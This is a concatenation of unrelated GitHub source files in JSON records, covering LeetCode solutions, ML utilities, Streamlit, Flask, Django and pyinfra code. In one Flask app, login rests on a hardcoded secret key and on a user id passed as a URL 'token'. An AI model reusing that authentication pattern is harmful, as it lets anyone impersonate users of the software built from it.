__init__(self, val, left, right, next):\n self.val = val\n self.left = left\n self.right = right\n self.next = next\n\"\"\"\nclass Solution(object):\n def connect(self, root):\n \"\"\"\n :type root: Node\n :rtype: Node\n \"\"\"\n if root == None:\n return None\n root.next= None\n queue = collections.deque()\n queue.append(root)\n queue.append(None)\n \n while queue:\n current = queue.popleft()\n if current:\n current.next = queue[0]\n if current.left:\n queue.append(current.left)\n if current.right:\n queue.append(current.right)\n elif queue:\n queue.append(None)\n return root\n \n \n","repo_name":"rsumukha/leetcode","sub_path":"116_populating_right_pointers_in_each_node.py","file_name":"116_populating_right_pointers_in_each_node.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10053865517","text":"# -*- coding:utf-8 -*-\nfrom flask import Flask\nfrom config import SQLALCHEMY_DATABASE_URI, SQLALCHEMY_ECHO\nfrom flask_login import LoginManager\nfrom lunchapp.model.user import *\n\nSECRET_KEY = \"I AM HUNGRY\"\n\nlogin_manager = LoginManager()\n\n\n@login_manager.user_loader\ndef load_user(id):\n return User.query.get(id)\n\n\n@login_manager.request_loader\ndef load_user_from_request(request):\n\n # first, try to login using the api_key url arg\n id = request.args.get('token')\n if id:\n user = User.query.get(id)\n if user:\n return user\n\n # finally, return None if both methods did not login the user\n return None\n\n\ndef create_app():\n app = Flask(__name__)\n app.secret_key = SECRET_KEY\n app.config.update({\n 'SQLALCHEMY_DATABASE_URI': SQLALCHEMY_DATABASE_URI,\n 'SQLALCHEMY_ECHO': SQLALCHEMY_ECHO,\n 'SQLALCHEMY_TRACK_MODIFICATIONS': True\n })\n from model import db\n from .views import init_app as viewinit\n from .admin import admin\n db.init_app(app)\n viewinit(app)\n admin.init_app(app)\n login_manager.init_app(app)\n return app\n","repo_name":"Yucheng-Ren/lunchplace","sub_path":"lunchapp/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"43038683288","text":"from sklearn.datasets import load_iris\n\nfrom sklearn_selection import PMDiscoveryTool\n\n\ndef iris_example():\n iris = load_iris()\n x = iris.data\n y = iris.target\n\n iris_data = PMDiscoveryTool(x, x, y)\n iris_data.kneighbors_classifier_selection(weight_options=['uniform', 'distance'])\n\n\niris_example()\n\n\n","repo_name":"WillNye/MLSelectionTool","sub_path":"examples/neighbor_examples.py","file_name":"neighbor_examples.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35377619665","text":"import torchvision.transforms\nfrom torchsummary import summary\nfrom model.make_model import make_vgg19\nimport torch\nimport torch.nn as nn\nfrom torchvision import utils\nimport matplotlib.pyplot as plt\nfrom PIL import Image\n\ndef show_conv_weight_grid(model_layers, layer_num, visualize_type='avg', filter_index=None, nrow='auto',\n show=True, save=False, save_name=None): # feature layers\n \"\"\"make weight grid of pre-trained VGG19 (no bn)\n\n Args:\n :model_layers (nn.Sequential): layers of the model that want to make the weight grid\n\n :layer_num (int): layer to check\n\n :visualize_type ('one', 'avg'): determine how to visualize\n\n if visualize_type == one, visualize only one filter of layer (#filter_num)\n elif visualize_type == avg, visualize all filters of layer with avg\n\n :filter_index (None, int): determine which filter to visualize\n\n if visualize_type == avg, It is not used.\n\n :nrow('auto', 'input', int): how to determine nrow\n\n if nrow == 'auto', determine nrow by conv_nrow_dict,\n It only works when the {channel, filter_num}is in [16, 32, 64, 128, 256, 512, 1024]\n ({channel, filter_num} is determined by type)\n if not in [16, 32, 64, 128, 256, 512, 1024], change nrow to 'input'\n\n elif nrow == 'input', determine nrow by input\n\n elif nrow is int, directly determine nrow\n\n :show (bool): determine whether to show the results\n\n :save (bool): determine whether to save the results\n\n :save_name (None, str): determines the name to save\n\n if save == False, It is not used.\n\n Returns:\n None\n \"\"\"\n def _normalize(weight):\n weight_max = torch.max(weight)\n weight_min = torch.min(weight)\n temp = (weight + weight_min) / (weight_max + weight_min)\n return temp\n\n def _make_grid(weight, nrow=nrow):\n grid_size = weight.shape[0]\n temp = [weight[i] for i in range(grid_size)]\n change = False\n if nrow == 'auto':\n if grid_size in conv_nrow_dict.keys():\n temp_grid = utils.make_grid(temp, nrow=conv_nrow_dict[grid_size], padding=1)\n else:\n change = True\n\n if nrow == 'input' or change:\n row = int(input(f'num of filters (or channels) is {grid_size}, please enter int for nrow.'))\n temp_grid = utils.make_grid(temp, nrow=row, padding=1)\n\n if isinstance(nrow, int):\n temp_grid = utils.make_grid(temp, nrow=nrow, padding=1)\n\n img = torchvision.transforms.ToPILImage()(temp_grid)\n if save:\n img.save(f'./weight_jpg/{save_name}.png')\n if show:\n img.show()\n\n conv_nrow_dict = {16: 4, 32:4, 64: 8, 128: 8, 256: 16, 512: 16, 1024: 32}\n\n cnt = 0\n for layer in model_layers:\n if isinstance(layer, nn.Conv2d):\n cnt += 1\n if cnt == layer_num:\n p = layer.parameters()\n weight = next(p)\n num_filter = weight.shape[0]\n num_channel = weight.shape[1]\n\n if visualize_type == 'avg':\n temp = torch.mean(weight, dim=1)\n temp = _normalize(temp)\n temp = temp.unsqueeze(1)\n _make_grid(temp, nrow)\n\n elif visualize_type == 'one':\n temp = weight[filter_index]\n temp = _normalize(temp)\n temp = temp.unsqueeze(1)\n _make_grid(temp, nrow)\n\n","repo_name":"powerpowe/visualize-conv-weight","sub_path":"utils/weight_grid.py","file_name":"weight_grid.py","file_ext":"py","file_size_in_byte":3744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8167274414","text":"import os\nimport streamlit as st\nimport pandas as pd\nimport plotly.graph_objects as go\nimport plotly.express as px\n\nfrom datetime import datetime\n\nst.title('BHAVCOPY ANALYZER')\n\npath = \"P:\\DEPROJECT\\Analyzed_Company_file\"\nli = [os.path.splitext(filename)[0] for filename in os.listdir(path)]\n\nselect_event = st.selectbox('', li)\ndf = pd.read_csv(f\"P:/DEPROJECT/Analyzed_Company_file/{select_event}.csv\")\ndf\n\nfig = go.Figure(data=[go.Candlestick(x=df['DATE'],\n open=df['OPEN_PRICE'],\n high=df['HIGH_PRICE'],\n low=df['LOW_PRICE'],\n close=df['CLOSE_PRICE'])])\n\nfig\nlst = [\n 'Total treaded quantity',\n 'Delivery percentage(in %)',\n 'Delivery vs treading',\n 'Intradey volume',\n 'Number of treades'\n]\n\nop = st.selectbox('', lst)\n\nif op == 'Total treaded quantity':\n fig = go.Figure(\n data=[go.Bar(y=df['TTL_TRD_QNTY'].iloc[:-1], x=df[\"DATE\"])],\n layout_title_text=\"\"\n )\n fig\nelif op == 'Delivery percentage(in %)':\n fig = go.Figure(\n data=[go.Bar(y=df['DELIV_PER'].iloc[:-1], x=df[\"DATE\"])],\n layout_title_text=\"\"\n )\n fig\nelif op == 'Delivery vs treading':\n fig = go.Figure(\n data=[go.Bar(name='Delivery', y=df['DELIV_QTY'].iloc[:-1], x=df[\"DATE\"]),\n go.Bar(name='treading', y=df['TTL_TRD_QNTY'].iloc[:-1], x=df[\"DATE\"])\n ],\n layout_title_text=\"\"\n )\n fig\nelif op == 'Intradey volume':\n fig = go.Figure(\n data=[go.Bar(y=df['Intraday_volume'].iloc[:-1], x=df[\"DATE\"])],\n layout_title_text=\"\"\n )\n fig\nelif op == 'Number of treades':\n fig = go.Figure(\n data=[go.Bar(y=df['NO_OF_TRADES'].iloc[:-1], x=df[\"DATE\"])],\n layout_title_text=\"\"\n )\n fig\n","repo_name":"dharmitpatel81/nse-bhavcopy-analyzer","sub_path":"streamlit.py","file_name":"streamlit.py","file_ext":"py","file_size_in_byte":1834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74502820967","text":"# https://leetcode.com/problems/convert-bst-to-greater-tree/submissions/\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\nclass Solution:\n def convertBST(self, root: TreeNode) -> TreeNode:\n self.sum = 0\n def inverted_inorder(node):\n # node.right --> node --> node.left\n if node:\n inverted_inorder(node.right)\n self.sum += node.val\n node.val = self.sum\n inverted_inorder(node.left)\n \n inverted_inorder(root)\n return root","repo_name":"linminhtoo/algorithms","sub_path":"BinarySearchTree/medium/convertBST.py","file_name":"convertBST.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10144725645","text":"import ijson\nfrom bs4 import BeautifulSoup\nimport re\nimport tensorflow_hub as hub\nimport faiss\nimport pickle\nimport numpy as np\nimport sys\ndef analyze_posts():\n classDocStrings={}\n sampleClassDocStrings=[]\n sampleStackOverFlow=[]\n with open('../../data/codeGraph/merge-15-22.2.format.json','rb') as data:\n docStringObjects = ijson.items(data, 'item')\n parsedLines = 0\n for docString in docStringObjects:\n parsedLines += 1\n if parsedLines % 10000 == 0:\n if 'class_docstring' in docString:\n if 'class_docstring' != None:\n className = docString['klass']\n classDocStrings[className] = 1\n sampleClassDocStrings.append(className)\n \n if 'class_docstring' in docString:\n if 'class_docstring' != None:\n className = docString['klass']\n classDocStrings[className] = 1\n else:\n pass\n with open('../../data/codeGraph/stackoverflow_questions_per_class_func_1M.json', 'r') as data:\n docStringObjects = ijson.items(data, 'results.bindings.item')\n countClassNotinDocstring=0\n countClassInStackOverflow=0\n\n with open('../../data/codeGraph/StackOverFlowDocstringSimilarityAnalysis.txt', 'w') as outputFile:\n print(\"comparing with stackoverflow posts\")\n sys.stdout=outputFile\n for docString in docStringObjects:\n parsedLines += 1\n classType = docString['type']['value'].replace('http://purl.org/twc/graph4code/ontology/', '')\n if classType != 'Class':\n continue\n classLabel = docString['class_func_label']['value'].lower() # this might not be needed\n if classLabel not in classDocStrings:\n countClassNotinDocstring+=1\n countClassInStackOverflow+=1 \n else:\n countClassInStackOverflow+=1 \n if parsedLines % 5000 == 0:\n sampleStackOverFlow.append(classLabel)\n \n \n\n \n print(\"number of classes not in docstring:\", countClassNotinDocstring)\n print(\"number of classes in Stackoverflow:\", countClassNotinDocstring)\n print(\"number of unique docstrings\",len(classDocStrings))\n print(\"Class doc strings\",sampleClassDocStrings)\n print(\"Class stackoverflow strings\",sampleStackOverFlow)\n \n \n \n \n\n\n\nif __name__ == '__main__':\n analyze_posts()\n","repo_name":"tetherless-world/CodeGraph","sub_path":"embeddingsTest/docstringsStackoverflowAnalysis.py","file_name":"docstringsStackoverflowAnalysis.py","file_ext":"py","file_size_in_byte":3332,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"3222675189","text":"\"\"\"\nWorkload Generator (Simulator) for Benchmarking System.\nGenerating the requests (arrival time) according a fixed time duration and rate\nby poisson distribution.\n@author huangyz0918 (Yizheng Huang) and huaizhengzhang (Huaizheng Zhang)\nReference:\n - https://stackoverflow.com/questions/8592048/is-random-expovariate-equivalent-to-a-poisson-process\n - https://stackoverflow.com/questions/1155539/how-do-i-generate-a-poisson-process\n - https://github.com/marcoszh/MArk-Project/blob/master/experiments/request_sender.py\n - http://web.stanford.edu/class/archive/cs/cs109/cs109.1192/lectureNotes/8%20-%20Poisson.pdf\n - http://web.mit.edu/modiano/www/6.263/lec5-6.pdf\n\"\"\"\nimport random\n\n\nclass WorkloadGenerator:\n \"\"\"\n Class of the requests generator.\n \"\"\"\n\n @staticmethod\n def gen_arrival_time(duration=60 * 1, arrival_rate=5, seed=None):\n \"\"\"\n Generating the arrival time according to the poisson distribution.\n :param duration: the requests sending duration (in second).\n :param arrival_rate: the average number of requests per second.\n :param seed: the random seed to reproduce the generated results.\n :return: a list of time to send requests.\n \"\"\"\n start_time = 0\n arrive_time = []\n\n if seed is not None:\n random.seed(seed)\n\n while start_time < duration:\n start_time = start_time + random.expovariate(arrival_rate)\n arrive_time.append(start_time)\n\n return arrive_time","repo_name":"MLSysOps/MIGProfiler","sub_path":"migperf/profiler/inference/client/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"53"} +{"seq_id":"36081374818","text":"#!/usr/bin/env python3\n\n# Exécuter ce script pour (ré-)entrainer le modèle\n# IMPORTANT : laisser la valeur de percentage à 1 dans jsonreader.py pour sauvegarder toutes les données\n# Ne changer cette valeur que pour tester le modèle (exemple : 0.8 pour un ratio 80-20)\n\nfrom open_json import *\nfrom jsonreader import *\nfrom make_dico import *\nfrom sklearn import tree\nimport pickle\nimport os\n\ndata_root = 'data'\n\nif os.path.isdir(data_root):\n try:\n features = pickle.load(open('model/features.sav', 'rb'))\n targets = pickle.load(open('model/targets.sav', 'rb'))\n class_dict = pickle.load(open('model/class_dict.sav', 'rb'))\n pass\n except:\n features = []\n targets = []\n class_dict = dict()\n pass\n # initialistion liste de données global\n \n eval_features = []\n eval_targets = []\n eval_info = []\n\n # Chargement de la liste des nouveaux fichiers référence (dossier data)\n json_files = json_path(data_root)\n\n # Parcours des fichiers\n for file in json_files:\n\n # Construction des listes de données\n tmp_features, tmp_targets, tmp_info = make_data(file)\n tmp_eval_features, tmp_eval_targets, tmp_eval_info = make_test_data(file)\n\n # Construction du dictionnaire des classifications\n tmp_class_dict = make_dico_target_last(file)\n\n # update des liste de donnée global\n features.extend(tmp_features)\n targets.extend(tmp_targets)\n eval_features.extend(tmp_eval_features)\n eval_targets.extend(tmp_eval_targets)\n class_dict.update(tmp_class_dict)\n\n # Uniformisation des listes (pour que les lignes aient toutes la même longueur)\n features, eval_features = uniformise_features(features, eval_features)\n\n # Construction de l'arbre de décision\n model = tree.DecisionTreeClassifier()\n model = model.fit(features, targets)\n\n nb_error = 0\n\n # Évaluation des données de test\n for i in range(len(eval_features)):\n answer = model.predict([eval_features[i]])[0]\n check = eval_targets[i]\n if answer != check:\n print(\"Je pense que ce produit a pour catégorie... \" + class_dict[answer])\n print(\"Le produit est en réalité dans la catégorie... \" + class_dict[check])\n nb_error = nb_error + 1\n\n # Pourcentage de précision de la machine\n if len(eval_features) > 0:\n raw_precision = ((len(eval_features) - nb_error) / len(eval_features))*100\n precision = format(raw_precision, '.2f')\n print(\"Le pourcentage de précision est de \\033[92m\" + str(precision) + \"%.\\033[0m\")\n print(\"Nombre d'erreurs : \" + str(nb_error) + \".\\n\")\n\n # Sauvegarde du modèle\n # AP check or create the directory and move processed files\n # into a new folder\n else:\n if not os.path.exists('model'):\n os.makedirs('model')\n pickle.dump(features, open('model/features.sav', 'wb'))\n pickle.dump(targets, open('model/targets.sav', 'wb'))\n pickle.dump(class_dict, open('model/class_dict.sav', 'wb'))\n print(\"Modèle sauvegardé.\")\n if not os.path.exists('learned'):\n os.makedirs('learned')\n pass\n for file in json_files:\n filename = os.path.basename(file)\n os.rename(file, \"learned/\" + filename)\n\nelse:\n print(\"No data directory found.\")\n","repo_name":"kenygia/VP_ProductDetectDefector","sub_path":"learning.py","file_name":"learning.py","file_ext":"py","file_size_in_byte":3390,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9913130095","text":"from django.conf.urls import patterns, url\nfrom project import views\n\nurlpatterns = patterns('',\n url(r'^$', views.index, name='index'),\n\t\turl(r'^twoperson/', views.twoperson, name= 'twoperson'),\n\t\turl(r'^threeperson/', views.threeperson, name= 'threeperson'),\n\t\turl(r'^movingknife/', views.movingknife, name= 'movingknife'),\n\t\turl(r'^fourperson/', views.fourperson, name= 'fourperson'),\n\t\turl(r'^about/', views.about, name= 'about')\n\t\t)","repo_name":"2092971R/cakecutting","sub_path":"project/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37000701152","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport os\nimport sys\nthis = os.getcwd()\npath = this[:this.rfind(\"/\")]\nif not path in sys.path: sys.path.append(path)\nxgboost_path = path + \"/xgboost_regressor\"\npromedios_path = path + \"/promedio_zona\"\n\nimport pandas as pd\nimport matplotlib\nfrom datos import FEATURES_DISPONIBLES\nfrom modelo import Modelo\n\npd.set_option('display.max_columns', 100)\npd.set_option('display.float_format', lambda x: '%.3f' % x)\n\n\n# In[2]:\n\n\nfrom xgboost_regressor.xgboost_predictor import XGBoostRegressor\nfrom promedio_zona.promedio_zona import PromedioZona\nfrom regresion_lineal.regresion_lineal import RegresionLineal\nfrom mlp_regressor.mlp_regressor import MLP_Regressor\n\n\n# In[3]:\n\n\nclass EnsambleConcatenados(XGBoostRegressor):\n \"\"\"\n Usa el resultado de las predicciones del modelo PromedioZona\n para entrenar y predecir con un XGBoostRegressor.\n \"\"\"\n \n \n @Modelo.cronometrar()\n def __init__(self):\n self.modelo_promedios = PromedioZona()\n self.modelo_lineal = RegresionLineal()\n self.modelo_mlp = MLP_Regressor()\n super().__init__() \n \n @Modelo.cronometrar()\n def cargar_datos(self):\n self.modelo_promedios.cargar_datos()\n self.modelo_lineal.cargar_datos()\n self.modelo_mlp.cargar_datos()\n super().cargar_datos()\n \n @Modelo.cronometrar()\n def entrenar(self):\n self.agregar_predicciones_modelo(self.modelo_lineal)\n self.agregar_predicciones_modelo(self.modelo_promedios)\n self.agregar_predicciones_modelo(self.modelo_mlp)\n super().entrenar()\n \n def agregar_predicciones_modelo(self, modelo):\n columna = 'prediccion_' + modelo.modelo\n modelo.entrenar()\n score = modelo.validar()\n print(\"Score individual {}: {}\".format(modelo.modelo, score))\n predicciones_train = modelo.predecir(modelo.train_data)\n predicciones_test = modelo.predecir(modelo.test_data)\n predicciones_submit = modelo.predecir(modelo.submit_data)\n self.train_data[columna] = predicciones_train['target']\n self.test_data[columna] = predicciones_test['target']\n self.submit_data[columna] = predicciones_submit['target']\n\n\n# In[4]:\n\n\nensamble = EnsambleConcatenados()\n\n\n# In[5]:\n\n\nensamble.cargar_datos()\n\n\n# In[6]:\n\n\nensamble.entrenar()\n\n\n# In[7]:\n\n\nensamble.validar()\n\n\n# In[8]:\n\n\npredicciones = ensamble.predecir(ensamble.submit_data)\n\n\n# In[10]:\n\n\ncomentario = \"con regresion lineal mejorada- local 533776 - entrena en 6k segundos\"\nensamble.presentar(predicciones, comentario)\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\npredicciones = ensamble.predecir(ensamble.test_data)\n\n\n# In[ ]:\n\n\ncolumnas_predictoras = ['target', 'prediccion_PromedioZona', 'prediccion_RegresionLineal']\nfor columna in columnas_predictoras:\n predicciones['diferencia_'+columna] = predicciones['precio'] - predicciones[columna]\n\n\n# In[ ]:\n\n\nmejores_100 = predicciones.sort_values(by='diferencia_target').head(200)\n\n\n# In[ ]:\n\n\npeores_100 = predicciones.sort_values(by='diferencia_target').tail(200)\n\n\n# In[ ]:\n\n\npeores_100.describe()\n\n\n# In[ ]:\n\n\nmejores_100.describe()\n\n","repo_name":"unmateo/7506-TP","sub_path":"src/tp2/modelos/ensamble_concatenados/ensamble.py","file_name":"ensamble.py","file_ext":"py","file_size_in_byte":3154,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42112239211","text":"# coding: utf-8\nimport sys, os\nsys.path.append(os.pardir) # 부모 디렉터리의 파일을 가져올 수 있도록 설정\nimport numpy as np\nimport common.optimizer as op\nimport matplotlib.pyplot as plt\n\n\nclass Trainer: # 신경망 훈련 시킴\n def __init__(self, network, x_train, t_train, x_test, t_test, epochs, batch_size, eval_size, optimizer, param={'lr':0.001}):\n self.network = network\n self.x_train = x_train\n self.t_train = t_train\n self.x_test = x_test\n self.t_test = t_test\n self.epochs = epochs\n self.batch_size = batch_size\n self.train_size = x_train.shape[0]\n self.test_size = x_test.shape[0]\n self.eval_size = eval_size\n self.iter_per_epoch = max(self.train_size // batch_size, 1)\n self.train_loss_list = []\n self.train_acc_list = []\n self.test_loss_list = []\n self.test_acc_list = []\n optimizer_class_dict = {'sgd':op.SGD, 'momentum':op.Momentum, 'nesterov':op.Nesterov, 'adagrad':op.AdaGrad, 'rmsprpo':op.RMSprop, 'adam':op.Adam}\n self.optimizer = optimizer_class_dict[optimizer.lower()](**param)\n\n\n def train(self):\n train_seq = np.arange(self.train_size)\n \n for i in range(self.epochs): # 전체 데이터 학습 반복 횟수\n print(\"\\n================== epoch \" + str(i+1) + \" ==================\")\n \n train_loss_avg = 0.0\n np.random.shuffle(train_seq)\n for j in range(self.iter_per_epoch): # 전체 데이터를 몇 개(=batch size)로 나눠서 학습하는가\n x_batch = self.x_train[train_seq[self.batch_size*j:self.batch_size*(j+1)]]\n t_batch = self.t_train[train_seq[self.batch_size*j:self.batch_size*(j+1)]]\n \n grads = self.network.gradient(x_batch, t_batch)\n self.optimizer.update(self.network.params, grads)\n \n train_loss = self.network.loss(x_batch, t_batch)\n train_loss_avg += train_loss\n \n print(str(j+1) + \": train_loss=\" + str(train_loss))\n \n train_loss_avg /= self.iter_per_epoch\n self.train_loss_list.append(train_loss_avg)\n train_acc = self.network.accuracy(self.x_train, self.t_train, self.batch_size)\n self.train_acc_list.append(train_acc)\n \n test_sample_idx = np.random.choice(self.test_size, self.eval_size)\n x_test_sample = self.x_test[test_sample_idx]\n t_test_sample = self.t_test[test_sample_idx]\n \n test_loss = self.network.loss(x_test_sample, t_test_sample)\n self.test_loss_list.append(test_loss)\n test_acc = self.network.accuracy(x_test_sample, t_test_sample, self.eval_size)\n self.test_acc_list.append(test_acc)\n \n print(\"\\nevaluation \" + str(i+1) + \": train_loss=\" + str(train_loss_avg) + \", test_loss=\" + str(test_loss) + \", test_acc=\" + str(test_acc))\n\n print(\"\\n================== Final Test Accuracy ==================\")\n test_acc = self.network.accuracy(self.x_test, self.t_test)\n print(\"test_acc:\" + str(test_acc))\n \n plt.xlabel('epochs')\n plt.xticks(np.arange(1, self.epochs + 1))\n plt.plot(np.arange(1, self.epochs + 1), self.train_loss_list, 'b', label='train_loss', linewidth=0.5)\n plt.plot(np.arange(1, self.epochs + 1), self.train_acc_list, 'y', label='train_acc', linewidth=0.5)\n plt.plot(np.arange(1, self.epochs + 1), self.test_loss_list, 'g', label='test_loss', linewidth=0.5)\n plt.plot(np.arange(1, self.epochs + 1), self.test_acc_list, 'r', label='test_acc', linewidth=0.5)\n plt.legend(loc=(0, 1.01), fontsize=8, ncol=4)\n plt.show()\n","repo_name":"LeeMyeongbo/ML_DL","sub_path":"DL_Projects/common/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":3864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33826355957","text":"from io import StringIO\nfrom pathlib import PosixPath\nfrom typing import Optional\nfrom pyinfra import inventory, host\nfrom pyinfra.api import operation\nfrom pyinfra.operations import files\nfrom libdeploys import docker_compose\nfrom util.compose import ComposeService, create_compose_file\n\nCONFIG_DIR = PosixPath(\"/etc/compose-apps\")\nDATA_DIR = PosixPath(\"/srv/compose-apps\")\n\n\n@operation\ndef create_app_dirs(name: str):\n config_dir = CONFIG_DIR / name\n data_dir = DATA_DIR / name\n yield from files.directory(config_dir, mode=755, _sudo=True)\n yield from files.directory(data_dir, mode=755, _sudo=True)\n return config_dir, data_dir\n\n\n@operation\ndef create_compose_app(\n name: str,\n services: list[ComposeService],\n networks: Optional[list[str]] = None,\n only_in_group: Optional[str] = None,\n):\n if networks is None:\n networks = []\n\n if only_in_group is not None:\n app_hosts = inventory.get_group(only_in_group)\n if host not in app_hosts:\n print(\n f\"Skipping {name} deploy on {host.name} because it is not in group {only_in_group}\"\n )\n return\n\n config_dir, data_dir = yield from create_app_dirs(name)\n\n compose_file_content = create_compose_file(\n services, networks, volume_base_dir=data_dir\n )\n compose_file_path = config_dir / \"docker-compose.yml\"\n yield from files.put(\n StringIO(compose_file_content),\n str(compose_file_path),\n _sudo=True,\n )\n\n yield from docker_compose.up(compose_file_path, _sudo=True)\n","repo_name":"ubipo/servers","sub_path":"libdeploys/compose_app/operations.py","file_name":"operations.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"70406216489","text":"\nfrom flask import Flask, jsonify, make_response, request\nfrom utils import create_chain\n\n\napp = Flask(__name__)\n\n@app.route(\"/\", methods = ['POST'])\ndef chat():\n if not request.is_json:\n return make_response(\n jsonify(\n {\"success\": False,\n \"error\": \"Unexpected error, request is not in JSON format\"}),\n 400)\n \n try:\n data = request.json\n message = data[\"message\"]\n chatgpt_chain = create_chain()\n prediction = chatgpt_chain.predict(human_input=message)\n \n return jsonify({\"success\": True, \"data\": prediction})\n except:\n return make_response(\n jsonify(\n {\"success\": False, \n \"error\": \"Unexpected error: failed to send the message\"}),\n 400)","repo_name":"homanp/gcp-langchain","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","stars":61,"dataset":"github-code","pt":"53"} +{"seq_id":"32279638236","text":"from flask import Flask, render_template, request\nimport os\nimport csv\nimport random\n\napp = Flask(__name__)\napp.secret_key = b'CHANGEME!!!!!!!!!!!!'\n\n\n@app.route('/')\ndef index():\n topic_choices = []\n dirs = os.listdir('./csv_files')\n for _dir in dirs:\n if os.path.isdir(f'./csv_files/{_dir}'):\n topic_choices.append(_dir)\n return render_template('index.html', topic_choices=topic_choices)\n\n\n@app.route('/topic')\ndef topic():\n topic_choice = request.args.get('topic')\n quiz_choices = []\n if topic_choice is not None:\n dirs = os.listdir(f'./csv_files/{topic_choice}')\n quiz_choices = dirs\n return render_template('topic.html', quiz_choices=quiz_choices, topic_choice=topic_choice)\n\n\n@app.route('/quiz')\ndef quiz():\n quiz_choice = request.args.get('quiz')\n topic_choice = request.args.get('topic')\n rows = []\n if request.args.get('rows') is None:\n if quiz_choice is not None:\n with open(f'./csv_files/{topic_choice}/{quiz_choice}') as f:\n csvreader = csv.reader(f)\n for row in csvreader:\n rows.append(row)\n else:\n rows = request.args.get('rows')\n random_row = random.choice(rows)\n random.shuffle(rows)\n return render_template('quiz.html', topic_choice=topic_choice, quiz_choice=quiz_choice, rows=rows, random_row=random_row)\n\n\nif __name__ == \"__main__\":\n app.debug = True\n app.run(host='0.0.0.0', port=50003, threaded=True)\n","repo_name":"zandersland/quiz_flask_server","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20556160939","text":"# oppia/av/views.py\nimport os\n\nfrom django.http import HttpResponse\nfrom django.shortcuts import redirect, get_object_or_404\nfrom django.urls import reverse\nfrom django.utils.translation import gettext_lazy as _\nfrom django.views.generic import ListView\n\nfrom av import handler\nfrom av.models import UploadedMedia\nfrom helpers.mixins.AjaxTemplateResponseMixin import AjaxTemplateResponseMixin\nfrom helpers.mixins.ListItemUrlMixin import ListItemUrlMixin\nfrom oppia.models import Media, Course\nfrom oppia.permissions import permission_view_course\n\nSTR_UPLOAD_MEDIA = _(u'Upload Media')\n\n\nclass AVHome(ListView, AjaxTemplateResponseMixin):\n\n template_name = 'av/home.html'\n ajax_template_name = 'av/query.html'\n queryset = UploadedMedia.objects.all().order_by('-created_date')\n extra_context = {'title': STR_UPLOAD_MEDIA}\n paginate_by = 25\n\n\nclass CourseMediaList(ListView, ListItemUrlMixin, AjaxTemplateResponseMixin):\n\n template_name = 'course/media/list.html'\n ajax_template_name = 'course/media/query.html'\n paginate_by = 10\n\n def get_queryset(self):\n course_id = self.kwargs['course_id']\n media = Media.objects.filter(course__id=course_id).order_by('id')\n for m in media:\n m.uploaded = UploadedMedia.objects.filter(md5=m.digest).first()\n return media\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['course'] = Course.objects.get(pk=self.kwargs['course_id'])\n context['uploaded'] = 0\n for media in context['paginator'].object_list:\n context['uploaded'] += 1 if media.uploaded else 0\n\n if self.request.GET.get('error', None) == 'no_media':\n context['no_media'] = True\n return context\n\n\ndef download_media_file(request, media_id):\n media = get_object_or_404(Media, pk=media_id)\n uploaded = get_object_or_404(UploadedMedia, md5=media.digest)\n filepath = uploaded.file.path\n with open(filepath, 'rb') as media_file:\n response = HttpResponse(media_file)\n response['Content-Disposition'] = 'attachment; filename=\"%s\"' % (media.filename)\n response['Content-Length'] = os.path.getsize(filepath)\n return response\n\n\n@permission_view_course\ndef download_course_media(request, course_id):\n course = get_object_or_404(Course, pk=course_id)\n media = Media.objects.filter(course=course)\n uploaded = UploadedMedia.objects.filter(\n md5__in=media.values_list('digest', flat=True))\n for file in uploaded:\n file.media = media.get(digest=file.md5)\n\n filename = course.shortname + \"_media.zip\"\n path = handler.zip_course_media(filename, uploaded)\n\n if path:\n with open(path, 'rb') as package:\n response = HttpResponse(package.read(), content_type='application/zip')\n response['Content-Length'] = os.path.getsize(path)\n response['Content-Disposition'] = 'attachment; filename=\"%s\"' % (filename)\n return response\n else:\n return redirect(reverse('av:course_media', kwargs={'course_id': course.pk})+'?error=no_media')\n","repo_name":"DigitalCampus/django-oppia","sub_path":"av/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3111,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"53"} +{"seq_id":"36520538906","text":"# Pythonic --> Below two concepts are crucial in understanding Python's ways of programming.\n# DUCK TYPING --> You assume that if an object walks like a duck and quacks like a duck. It is a duck.\n# EAFP --> Easier to Ask Forgiveness than 